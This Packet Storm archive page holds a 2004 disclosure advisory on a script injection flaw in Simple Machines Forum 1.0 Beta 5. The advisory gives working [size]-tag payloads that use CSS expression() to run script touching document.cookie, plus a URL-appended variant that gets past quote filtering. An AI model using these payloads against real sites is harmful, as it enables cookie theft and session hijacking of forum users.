exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

smfsize.txt

smfsize.txt
Posted May 7, 2004
Authored by Cheng Peng Su

SMF version 1.0 Beta 5 public is susceptible to a script injection vulnerability. This company used to produce YaBB SE.

tags | advisory
SHA-256 | e736457eeb8aafb46103798872b48e1a7e58d0fe8c0825054e41c0e3017ab7a0
Download | Favorite | View

smfsize.txt

Change Mirror Download


############################################################################

  Advisory Name : SMF SIZE Tag Script Injection Vulnerability
   Release Date : May 3,2004 
    Application : Simple Machines
        Test On : SMF 1.0 Beta 5 Public
     Vendor URL : http://www.simplemachines.org/
       Discover : Cheng Peng Su(apple_soup_at_msn.com)
     
############################################################################

 Intro:
       The team that has brought you YaBB SE has moved on to develop 
  the next evolution in forum software, Simple Machines Forum(SMF).
  They have rebranded themselves under the name Simple Machines.They
  said proudly that "SMF is a next-generation community software package
  and is jam-packed with features, while at the same time having a minimal
  impact on resources."
   
 Proof of conecpt:
       SMF doesn't filter scripting code strictly in the [size] tags,
  in other words,they forget to filter ()+ characters.Attacker can use
  the expression() syntax to set an malicious expression on font-size
  attribute.The code below is available.
  
     [size=expression(alert(document.cookie))]Just beginning[/size]
     
  but if you start complex code,you will know that some characters
  (such as quote,apostrophe and semicolon) are filtered by SMF, but 
  I found an available way without quote,apostrophe or semicolon, you
  will know this way from the Exploit below.
  
 Exploit:
       First,submit specially content like below
       
  [size=expression(eval(unescape(document.URL.substring(document.URL.
  length-41,document.URL.length))))]Big Exploit[/size]
 
  '41' in the content means the length of the malicious scripting.
  If the URL of the Topic above is
  
  http://site/index.php?topic=12345.0
  
  Make a link with malicious scripting like this:
  
  http://site/index.php?topic=12345.0&alert('Your cookie:\n'+document.
  cookie)
 
 Solution:
       SMF were notified and there may will be a release of a fix or update
  to resolve these issues. Who knows, maybe they don't care this' bug.

 Contact:
  apple_soup_at_msn.com
  Cheng Peng Su
  Class 1,Senior 2, High school attached to Wuhan University
  Wuhan,Hubei,China(430072)
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close